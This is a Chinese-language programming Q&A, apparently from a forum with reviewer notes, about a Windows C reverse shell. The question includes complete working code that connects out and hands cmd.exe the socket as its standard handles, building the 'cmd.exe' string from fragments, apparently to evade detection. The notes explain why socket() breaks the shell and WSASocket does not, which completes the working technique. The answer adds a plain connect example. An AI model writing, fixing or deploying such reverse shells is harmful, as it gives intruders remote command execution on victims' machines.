我正在用 C/C++ 写一段反向 shell 代码。它可以正常工作，但只有在我使用 WSAConnect 和 WSASocket 时才行。如果我改用 socket() 或 connect()，它就不工作了。为什么会这样？我平时一直都是用 connect() 代替 WSAConnect、用 socket() 代替 WSASocket 的。我肯定漏掉了什么。
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
/* File-scope state shared with main(). */
WSADATA wsa;                 /* filled in by WSAStartup() */
SOCKET sock;                 /* the socket later handed to the child as stdio */
SOCKADDR_IN server;          /* target endpoint, populated in main() */
STARTUPINFO sinfo;           /* start-up info passed to CreateProcess() */
PROCESS_INFORMATION pinfo;   /* process/thread handles returned by CreateProcess() */
/*
 * Connects to 127.0.0.1:4942 and launches cmd.exe with the connected socket
 * as the child's stdin/stdout/stderr (a loopback reverse-shell test).
 * Nothing is checked: the return values of WSAStartup(), WSASocket(),
 * WSAConnect() and CreateProcess() are all ignored, so any failure is only
 * visible as a silent exit.
 */
int main(int argc, char *argv[])
{
WSAStartup(MAKEWORD(2,2), &wsa);
/* NOTE(review): this is the line that matters. socket() creates a socket
 * with WSA_FLAG_OVERLAPPED set by default; a child doing ordinary
 * synchronous ReadFile()/WriteFile() on an overlapped handle does not get
 * the expected behaviour, which is why the shell breaks with socket().
 * WSASocket() with dwFlags = 0 (the last argument below) returns a
 * non-overlapped handle that can serve as a standard handle. */
// sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); This also doesn't work
/* The two (unsigned int)NULL casts are just 0: group = 0, dwFlags = 0. */
sock = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
server.sin_family = AF_INET;
server.sin_port = htons(4942);
server.sin_addr.s_addr =inet_addr("127.0.0.1");
/* NOTE(review): connect() is presumably fine once the socket itself is
 * non-overlapped; the socket creation above is the real difference. */
// connect(sock, (struct sockaddr*)&server, sizeof(server)); This doesn't work
WSAConnect(sock,(SOCKADDR*)&server, sizeof(server),NULL,NULL,NULL,NULL);
/* Fragile success test: the documented check is the return value of
 * WSAConnect() (SOCKET_ERROR on failure). The thread's last-error value is
 * only meaningful after a call has reported failure. */
if (WSAGetLastError() == 0) {
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb=sizeof(sinfo);
sinfo.dwFlags=STARTF_USESTDHANDLES;
/* The socket handle is used as all three standard handles. This relies on
 * CreateProcess() being called with bInheritHandles = TRUE below and on the
 * socket being inheritable (WSA_FLAG_NO_HANDLE_INHERIT was not set). */
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sock;
/* "cmd.exe" is assembled from fragments at run time — presumably so the
 * literal does not appear in the binary. command[8] is exactly 7 chars +
 * NUL, and snprintf() bounds the write. */
char *myArray[4] = { "cm", "d.e", "x", "e" };
char command[8] = "";
snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);
/* lpCommandLine is a writable local buffer (required by the Unicode variant
 * of CreateProcess, which may modify it). The handles in pinfo and the
 * socket are never closed; exit(0) is called while the child keeps running. */
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
exit(0);
} else {
exit(0);
}
}
你的代码是 C 而不是 C++，所以你的标签打错了。另外，Microsoft 在文档中声明 inet_addr 已被弃用，应改用同时支持 IPv6 地址的 getaddrinfo。下面的代码可以正确建立连接。（审校注：inet_addr 并不是你那两行被注释掉的 socket()/connect() 失败的原因。socket() 默认创建的是重叠（overlapped）套接字，而 WSASocket 在 dwFlags 为 0 时创建的是非重叠套接字；只有非重叠的句柄才能被子进程当作标准输入/输出句柄做同步读写，这才是你的 WSASocket 版本能工作的原因。下面的示例只演示连接，并没有把套接字交给子进程。）
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
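/*
 * Resolve 127.0.0.1:4942 with getaddrinfo() and connect to it over TCP using
 * the plain socket()/connect() pair, printing "Connected" or
 * "Failed to connect".
 *
 * Returns 0 on success and -1 on any failure (Winsock init, resolution,
 * socket creation or connect), so a caller can tell the outcomes apart;
 * the original returned 0 even when the connect failed.
 *
 * Note: this only shows that socket()/connect() can establish the
 * connection. It never hands the socket to a child process as the
 * question's code does, so it does not exercise the WSASocket() difference.
 */
int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    WSADATA data = { 0 };
    if (WSAStartup(MAKEWORD(2, 2), &data) != 0) {
        return -1;
    }

    /* Hints: TCP stream. ai_family is left at 0 (AF_UNSPEC) so the
     * resolver may return IPv4 or IPv6 entries. */
    struct addrinfo hints = { 0 };
    hints.ai_protocol = IPPROTO_TCP;
    hints.ai_socktype = SOCK_STREAM;

    struct addrinfo* res = NULL;
    if (getaddrinfo("127.0.0.1", "4942", &hints, &res) != 0 || res == NULL) {
        WSACleanup();
        return -1;
    }

    /* Try every returned address rather than only the first one, closing
     * each socket that fails to connect. */
    SOCKET connection = INVALID_SOCKET;
    for (struct addrinfo* ai = res; ai != NULL; ai = ai->ai_next) {
        connection = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (connection == INVALID_SOCKET) {
            continue;
        }
        /* ai_addrlen is size_t; connect() takes an int namelen. */
        if (connect(connection, ai->ai_addr, (int)ai->ai_addrlen) != SOCKET_ERROR) {
            break;
        }
        closesocket(connection);
        connection = INVALID_SOCKET;
    }
    freeaddrinfo(res);

    if (connection == INVALID_SOCKET) {
        printf("Failed to connect\n");
        WSACleanup();
        return -1;
    }

    printf("Connected\n");
    closesocket(connection);
    WSACleanup();
    return 0;
}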
你可以做得比我更好一些，例如把它拆成一个单独的函数，并传入一个保存已打开句柄的结构体。